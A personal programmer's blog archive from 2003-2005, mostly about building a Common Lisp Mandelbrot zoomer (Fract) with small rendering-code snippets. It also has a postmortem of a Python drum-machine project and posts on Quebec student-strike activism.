That's what you get with a "gamer" card: crap. They make it cheap because they expect you to move to a bigger card as soon as you can. Next time I'll get a 50$ card with open specs and free software drivers for GNU/Linux. I'll get one without a heat sink, one not designed to melt as soon as the warranty is over.

2005-06-03 Sans-FEUQ Wiki

The FEUQ is a provincial "union of student unions". It is to blame for the miserable ending of the 2005 student strike. My student union, AESS, will hold a referendum next semester on whether to stop being a member of the FEUQ. I made a Sans-FEUQ Wiki for the disaffiliation promotion committee.

2005-04-28 Planet Lisp'd

Once the Fract Movie Pack 1 was rendered, Zach Beane offered to host a torrent. Fract is now featured on Planet Lisp! Since that means I get a lot of instant hits, I had to take the other movies offline. Do not despair: you can now grab the Movie Pack 1 torrent and get 20 high resolution movies for the same price!

update: The traffic is almost back to normal so you can hammer the old movies again.

update: The torrent is gone. Many gigs were uploaded, something I could not have handled alone. Thanks to everyone who seeded! You will have to wait for the Movie Pack 2 if you didn't get the torrent while it was up.

2005-04-25 Fractal Zooming Movies

I had the opportunity to chat with David Steuber, a truly dedicated fractaler. David has been rendering frames for his new fractal movie for the last few months. After I watched his first movie, I wanted more, so I added movie support to Fract. It's basically the same thing as the zoom trail but with many times more frames and a file numbering scheme that helps the encoder. The Fract generated fractal zooming movies come from spots in the scoreboard; I may add automatic movie rendering for the top rated regions in the future.
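
The numbering trick is nothing fancy. A sketch of what I mean, with render-frame as a hypothetical stand-in for the real rendering call:

      ;; "frame-000042.png" sorts lexically in playback order, which
      ;; is all the encoder really needs.  RENDER-FRAME is made up.
      (defun render-movie-frames (nb-frames)
        (loop for i from 0 below nb-frames
              do (render-frame (format nil "frame-~6,'0d.png" i))))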

2005-04-21 Anti-aliasing and Takeover

I added anti-aliasing to Fract. For regular images, anti-aliasing is best done by averaging a grid of sub-pixels. For the Mandelbrot Set, dividing a pixel into sub-pixels actually increases the probability of falling into a punctually detailed region. A solution found by SunCode on sci.fractals is to keep only the minimal escape value of all the sub-pixels. The result is great! Unfortunately, a 3x3 sub-pixel grid is 9 times slower to compute, so I'm not likely to add anti-aliasing to the Web interface unless I receive some hardware donations. ; )
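
If you want to try it at home, the change to the per-pixel loop is tiny. A sketch, where escape-count stands in for the real per-point iteration function (the names are illustrative, not Fract's actual code):

      ;; Keep the minimal escape value over a 3x3 sub-pixel grid
      ;; instead of averaging: averaging would pull in the punctually
      ;; detailed regions that sub-sampling is more likely to hit.
      (defun min-escape (c pixel-size &key (grid 3))
        (let ((step (/ pixel-size grid)))
          (loop for i from 0 below grid
                minimize (loop for j from 0 below grid
                               minimize (escape-count
                                         (+ c (complex (* i step)
                                                       (* j step))))))))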

In the meantime someone called Lahvak decided to take over the top 10. In the last few days he submitted several great regions and many of them made it to the top 10. Lahvak now holds more than half of the top slots. Congratulations Lahvak!

With the trail feature, I noticed a trend: many of the best regions originate from the tail or from somewhere behind a random cardioid. Also, most of the top 10 is dominated by the funky-2 color map. This either means that this one is particularly great or that all the other maps are really ugly. I fear the latter, so I'll try to make a few other maps.

2005-04-17 More Gears

Many really interesting regions were submitted and many votes helped to sort them out. The top region (dropped to second as I write this) was promoted to t-shirts. I made a few tweaks to the color map to blend it into white. As usual, I made a high resolution render with several orders of magnitude more iterations, 1000 times more colors and anti-aliasing. You can get the new gears from the EU and US Spreadshops or from Cafe Press.

Thanks to everyone who submitted regions and who voted!

2005-04-12 Back to School

The student strike is now over and it's time to get back to work. In all of my courses, teachers were accommodating about rearranging the calendar, assignments and exams. All but one: Philippe Gabrini decided that strikers were not worthy of his collaboration.

2005-04-10 Gradients and Partial Iterations

After a few submissions to the voting booth I realized how ugly my color maps were. I decided to tweak them a bit but they were still ugly, so I looked for an alternative. Gimp gradients were my first stop and I'm really pleased with the result. The file format is undocumented but really simple. The gradient editor in the Gimp really lacks an undo but apart from that it was just what I needed. The gradients shipped with the Gimp are not really suited to fractals but I made a few of my own with interesting results.

With multiple gradients inside a single color map, the color step from one iteration to the next is more apparent. I found an interesting article about using the modulus from the last iteration to compute partial iterations. The result is impressive. One drawback is that it requires a bit more precision to compute the partial iterations, so we lost a digit of freedom on the zoom, and a few interesting submissions from the voting booth along with it.
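
For the record, the formula in that family of articles is the classic renormalized iteration count. A sketch, assuming z is the complex value at the iteration n where its modulus first exceeded the escape radius:

      ;; Partial iteration count: the fractional part comes from the
      ;; modulus of z at escape time, n + 1 - log(log|z|)/log 2.
      (defun partial-iterations (n z)
        (- (+ n 1)
           (/ (log (log (abs z))) (log 2d0))))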

2005-04-09 Fract 0.5.9

The latest Fract is out. It is now possible to move interesting regions into the voting booth and to download wallpaper sized images. Xach improved Salza again; it's now almost two times faster. The bottleneck is now in Poly-pen. I can get rid of the CLOS dispatch time with some declarations but there is still too much consing: constructing a point object for every pixel is quite sub-optimal. I expected it to come back to haunt me one of these days.
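
The declarations in question look something like this. A sketch only, with plot-pixel standing in for the real Poly-pen call (the names are illustrative, not Fract's actual code):

      ;; A monomorphic pixel loop: the type declarations let the
      ;; compiler skip generic dispatch, and passing raw double-floats
      ;; instead of building a point instance per pixel avoids the
      ;; consing.
      (defun render-row (y width)
        (declare (type double-float y)
                 (type fixnum width)
                 (optimize (speed 3)))
        (loop for x of-type fixnum from 0 below width
              do (plot-pixel (coerce x 'double-float) y)))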

It was a good move to add user voting. Only a few hours after the release, people are already finding spots I had never seen before. The next step will probably be user comments, unless popularity forces me to fix the consing first. I'm still not pleased with the color maps. The zoom independent color map is much better but I still see places where a single tone is dominant. It's sad since those places are usually filled with interesting details. Maybe there is no one-size-fits-all color map and I'll have to ship a bundle of them.

2005-03-27 Posters

The Québec student strike goes on and, with the help of the activity committee, I managed to put together a poster representing the scientists on strike. We printed a few 5 foot tall posters and, to our amazement, some people wanted to buy them. So we asked everyone who has content on the poster if it was OK with them. If you are interested, you have two options: you can either go straight to the AESS to get a 5 foot print on the spot or hit my web store to order a 35 inch print by mail. All the profits go to the Strike Fund. Don't wait too long, we won't offer the poster after the strike.

2005-03-15 Black T-Shirts

I managed to get black t-shirts; you can get them from either my US SpreadShop or my European SpreadShop. They look great with Zachery Bir's save-lisp-and-die logo, but unfortunately I can't have fractals on them, at least for now. Dark shirts only support two color vector graphics, so I'll have to do some major hacking if I want to render fractals for them. Do not despair, this is doable, it just takes a bit more thinking.

2005-03-14 More Colors

Zach Beane made yet another fast image writer; this time we have PNG. If we can get 24-bit colors for free, better use lots of them! So now we run at 1024 iterations. The set looks great when you crank up the iteration count, and the progressive color map is well suited to playing with the iteration count. I only lowered the progression factor a bit since we tend to zoom more now. I'll probably have to switch to double floats soon. The black pixels are starting to get really expensive; you can clearly see that images with lots of black take a while to render. I'll try to detect cycles, that should speed things up a bit. Maybe we can crank it up to 2048...
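
The cycle detection I have in mind is the usual trick: an orbit that stays inside the set eventually becomes periodic, so comparing z against a periodically saved value lets us bail out early on the black pixels. A sketch, not yet Fract's code:

      ;; Early exit for interior points: if the orbit revisits a saved
      ;; value it can never escape.  The check window doubles so that
      ;; cycles of any length are eventually caught.
      (defun escape-count (c max-iter)
        (let ((z #c(0d0 0d0))
              (saved #c(0d0 0d0))
              (check-at 1))
          (loop for n from 1 to max-iter
                do (setf z (+ (* z z) c))
                   (when (> (abs z) 2d0)
                     (return n))        ; escaped: color by N
                   (when (= z saved)
                     (return nil))      ; cycle: a black pixel
                   (when (= n check-at)
                     (setf saved z
                           check-at (* 2 check-at)))
                finally (return nil))))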

2005-03-13 Progressive Color Map

I finally changed the color spiral map to follow a logarithmic spiral path. The effect is simply great! At a high iteration count, the edge of the set gets more sharply defined, but the number of iterations required to escape varies enormously near the set, while further away the variation is almost linear. With the linear color map, cranking up the iteration count would yield a better defined set, but only a small portion of the edge near the set would receive most of the color shades. With the new progressive color map, the edge near the set receives slowly progressing shades while the parts far from the edge get fast progressing ones. Take a look at it in action: the old color map has only a few colors far from the edge while the progressive map spreads the colors evenly across the whole image.
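
In one dimension, the idea boils down to indexing the shades by the logarithm of the escape count; the spiral version does the same thing along the spiral path. A simplified sketch, with names of my own choosing:

      ;; The log compresses the large, wildly varying escape counts
      ;; near the set (slowly progressing shades) and spreads the
      ;; small counts far from it (fast progressing shades), instead
      ;; of a straight linear mapping.
      (defun color-index (n max-iter nb-colors)
        (floor (* nb-colors
                  (/ (log (1+ n)) (log (1+ max-iter))))))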

2005-03-07 Fractal Gears

Many of you suggested putting the high resolution images on t-shirts, so I've put some of them in a CafePress shop. The basic store deal limits the number of items I can offer, but if you find great spots that are t-shirt worthy, let me know and I'll update the products.

2005-03-07 Releases

I finally got bored with the primitive navigation in Fract, so I added re-centering by clicking. Fortunately, when I asked the people on #lisp if it was good enough, they told me it was too slow. If they hadn't, I could have left it with the tiny little 100x100 image. Since Xach had just finished his GIF writer, he proposed it as an alternative to CL-SDL, which is quite fast but only saves BMPs.

Skippy, the GIF writer, only does point operations, but that's exactly what I needed (and it makes coding the Poly-pen back-end a lot less work). Poly-pen proved its usefulness: I was able to switch the back-end in Fract without any trouble, for the greater good of the greater number. Xach's back-end is in pure Lisp; I think crossing the UFFI costs a lot of CPU cycles, since I was able to double the image size while reducing the rendering time. One of these days I should code a benchmark suite for all the back-ends in Poly-pen.

So you can now enjoy Poly-pen 0.3.1, featuring improved histograms and a new ultra-fast back-end for GIFs, and Fract 0.5: faster, with bigger images and improved navigation!

Enjoy!

2005-01-23 OBB's Postmortem

If you went to OBB's website recently, you probably haven't noticed anything new. OBB went from nothing to 0.7 (the last release with major features) in a relatively short time span: ~6 months. The fact that we couldn't come up with anything new in over a year should be seen as confirmation that the project is dead. After a few beers with Vince, we came to the conclusion that we probably won't come up with new features and that it was time to move from OBB to something else. Let's take a moment to see what was good and what went wrong with OBB.

A long time ago, Vince suggested that we code a beat box for GNU/Linux. I had never used a drum machine before, but I knew how to make custom graphics dance on the screen, so I was convinced I could make something that looked nice. It took us some time to get started; we wanted to see what technology was available. I didn't want to do raw input management with SDL, but I didn't want ugly rectangular widgets like in all the high-level toolkits either. The goals were:

  • portability
  • impressive GUI
  • plug-in type sound-effects

Looking at successful drum machines, those seemed like the keys to success. We needed portability because our target platform was GNU/Linux, but there were almost no audio tools for GNU/Linux back then, so we needed to attract audio artists on whatever platform they were using. We needed an impressive GUI: there was no drum machine out there with a plain GUI. I don't know why; technically a plain GUI would eat fewer CPU cycles and free resources for more sound effects. Who cares if your tools are ugly, we won't see them on the CD. OK, that's not entirely true: trackers are popular and extremely ugly. Finally, we needed plug-ins for sound effects. I'm not too sure why either, but that was a common feature of popular drum machines.

For maximal portability, we went with Python, Qt and CSound. If you've ever spent 20 minutes staring at compiler output just to test some basic feature you added, you know why we went with Python. It is also really painful to make a build system work on both Windows and GNU/Linux, though Qt helps a lot. Qt provides all the input support and lets you do all the drawing by hand if you don't want to use the QWidgets. CSound is a really powerful batch file synthesizer. That setup is optimal for rapid application development; the plan was to show an array of pretty buttons, read their on/off state, write a batch file to disk, call CSound and write the result to /dev/audio.

I think we spent more time on the website than it took to come up with 0.1. One thing that is sure is that I spent a lot more time in the Gimp than on the code. Impressive GUIs are not developer friendly. OBB 0.1 would eat up 40% of the CPU, so we had to optimize some stuff before we could go any further. I rewrote the whole redrawing code many times. Python is fast enough most of the time, but its integer performance is bad and Psyco was not enough. When you have only rectangular widgets, you can compute the bounding box of the region to redraw with only two points. OBB has arbitrarily shaped widgets: you can't easily compute what is hidden by other widgets, so you have to redraw the whole widget stack in a region when it's invalidated. With lots of shortcuts and caching, the bottleneck of the redrawing was not OBB anymore, it was X. It seems that X doesn't like arbitrarily shaped windows. So keeping the drawing fast meant having as little animation as possible, which is no good for an impressive GUI if you ask me.

CSound too is slow. If you just sequence a few samples, it's fast, but if you add effects, it's really slow. That, we could not know until we added effects support. Our solution was to pre-compute some samples with the effects baked in and only ask CSound to sequence those. That led to a really unintuitive user interface. When playing with the panning bar, we didn't want to compute a panned sample until we knew the final panning, so it had no effect until the user released the mouse button. Then you would see the label stop scrolling for a split second and the beat continued with the new panning. To support effects properly we would have to drop CSound or do some massive hack. OK, I don't know too much about the sound part, so I'll let Vince elaborate further in his postmortem.

Then Trolltech, the maker of Qt, decided to stop producing a non-commercial version of Qt for Windows. That meant no more portability. Yes, we could live without portability, sound effects and animations, but that would put us quite far from our initial goal. As for the massive rewrite we realized we needed, well, it never came. The fact that neither of us had used a beat box before is a bit telling too. We were looking for a nice project, but that one wasn't particularly scratching an itch of ours.

So to summarize: you should code something that you plan to use, it will help usability a lot. You should use whatever technology lets you put together a working prototype as fast as possible. Once you have your working prototype, you have to be really critical. Is the technology up to the task? Really? Do you need to review the feature priorities? Custom GUIs are really nice to look at but not so nice to use and really painful to maintain. Think about it before you commit to a particular design. And finally, if you are not happy with your prototype and plan to move on to something else, make it clear so people won't be refreshing your website waiting for the next release. Hence this postmortem. You have plenty of choices now if you want a drum machine on GNU/Linux: Wired looks great and is coded by people who care about music, and Hydrogen is quite usable and has really good documentation. Now let me play with my fractals!

2005-01-06 New Layout

Finally, I retouched the layout. After so much time with the minimal style, I felt like something graphically intensive once again. The blue color map was just too relaxing; I spent the night zooming in and ended up with a few nice spots. The effect is known as "pure CSS compositing"; you can learn more about it on CSS/edge. Basically you need two images: a vivid one for the body background and a washed out one for the text background. You need huge images, but the washed out one compresses nicely. Tip: for the Mandelbrot Set we typically have one color per iteration; a point gets its color from the number of iterations it takes to escape. For 255 or fewer iterations, you can use indexed color images without any loss of quality.

Making the washed out image from the vivid one is pretty straightforward: you just paste a white layer and set its opacity to ~80%. A script to update the background would be a few lines, provided you have enough nice spots and bandwidth. At the moment the zooming is a bit broken in Fract; I can't just pick the URL of good spots and make bigger renders, I need to play with the zoom. Once this is fixed, we'll see how far I'm willing to take it.
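
If you'd rather script the washing out than open the Gimp, the blend is one line per channel. A sketch (my names, not part of any library):

      ;; Pasting a white layer at ~80% opacity moves every channel
      ;; 80% of the way towards 255.
      (defun wash-out (channel &optional (opacity 0.8))
        (round (+ (* opacity 255)
                  (* (- 1 opacity) channel))))

      ;; (wash-out 0) => 204 and (wash-out 255) => 255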

2005-01-05 More fractals

Once save-canvas-to-stream was in Poly-pen, there was no reason for me not to hook Fract into Araneida. Quite easy: just create a handler and save to the socket stream.

      ;; render into an SDL-backed canvas, then send the HTTP headers
      ;; and write the BMP straight to the socket stream
      (poly-pen:with-defaults (:backend :sdl
                               :canvas (:width width :height height))
        (render center width height (float zoom) nb-iter color-opt)
        (araneida:request-send-headers request
                                       :content-type "image/bmp")
        (poly-pen:save (araneida:request-stream request)))

So you can now zoom the Mandelbrot Set wherever you are. The color map is still static in the web interface; the default is a nice relaxing blue map. I don't know if I should let users play with the color map. Everyone I explain the color spiral map to seems to get confused and keeps nodding politely while their eyes show they are completely lost. I will probably end up writing a renderer for a color wheel that puts a big fat black line on the spiral path. Anyway, you've read enough of that and you deserve some nice images. Ain't that blue map relaxing? I could zoom it all night long...

2005-01-02 Drawing in CL

I decided that I would write more code in 2005. I know you forget your New Year's Eve resolutions quite fast, so I lost no time and coded a graphical proxy layer for Common Lisp: Poly-pen. Now that it's done, I can spend the rest of the year refreshing /.! : )

2004-10-13 GPG Key

I have a new GPG key. Be sure to update your keyrings (and to check my id (and to sign my key)).

2004-10-13 Hi-res Fractals

I made a few high resolution, ready to print images of the Mandelbrot Set.

I'm still experimenting with the color map; these are better than the first images, but I still see some aspects that could be improved. The shading is now linear, which means that if I crank up the number of iterations, most of the color map ends up near the black border of the set. With a progressive color map it should be possible to render an image with well defined edges without wasting all the colors in the transition area.

Stay tuned!

2004-10-10 Fractals

It's been a long time since I updated this page, I hope you didn't waste too much time clicking refresh. I made a basic Mandelbrot Set zoomer. Be sure to check the pretty pictures! The code is in my GNU Arch archive: ygingras@ygingras.net--2004/fract--devel--0
Enjoy! : )

2003-11-24 Nethack

I finally finished NetHack and I recorded the whole thing, so you'd better enjoy!


Copyright © 2001-2005 Yannick Gingras <ygingras@ygingras.net>

You can use my public key to send me secure transmissions.
